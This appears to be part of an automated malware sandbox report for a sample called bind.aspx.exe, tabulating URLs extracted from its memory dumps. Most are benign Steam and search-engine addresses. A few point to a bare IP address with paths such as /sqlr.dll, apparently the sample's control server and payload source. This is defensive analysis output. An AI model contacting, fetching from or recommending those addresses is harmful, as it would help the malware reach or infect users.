                                                                https://store.steampowered.com/points/shop/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BKKFHI.4.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://135.181.31.18Tbind.aspx.exe, 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                  unknown
                                                                  https://sketchfab.combind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119976112894176561199761128941[1].htm.4.drfalse
                                                                      unknown
                                                                      https://www.ecosia.org/newtab/BKKFHI.4.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://lv.queniujq.cnbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.youtube.com/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199761128941[1].htm.4.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://store.steampowered.com/privacy_agreement/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://135.181.31.18/sqlr.dllbind.aspx.exe, 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                            unknown
                                                                            https://steamcommunity.com/profiles/76561199761128941mbind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://135.181.31.18/hbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&ambind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://steamcommunity.com/profiles/76561199761128941bbind.aspx.exefalse
                                                                                  unknown
                                                                                  https://www.google.com/recaptcha/bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://135.181.31.18/;nbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://checkout.steampowered.com/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgbind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drfalse
                                                                                        unknown
                                                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://135.181.31.18/xbind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://store.steampowered.com/;bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://store.steampowered.com/about/76561199761128941[1].htm.4.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://steamcommunity.com/my/wishlist/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                            unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
URL | Source | Malicious | Antivirus Detection | Reputation
https://help.steampowered.com/en/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ | bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://steamcommunity.com/market/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://store.steampowered.com/news/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/ | bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | BKKFHI.4.dr | false | URL Reputation: safe | unknown
http://store.steampowered.com/subscriber_agreement/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://steamcommunity.com/profiles/76561199761128941/inventory/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://recaptcha.net/recaptcha/; | bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/discussions/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a | bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://store.steampowered.com/stats/ | bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://medal.tv | bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://broadcast.st.dl.eccdnx.com | bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
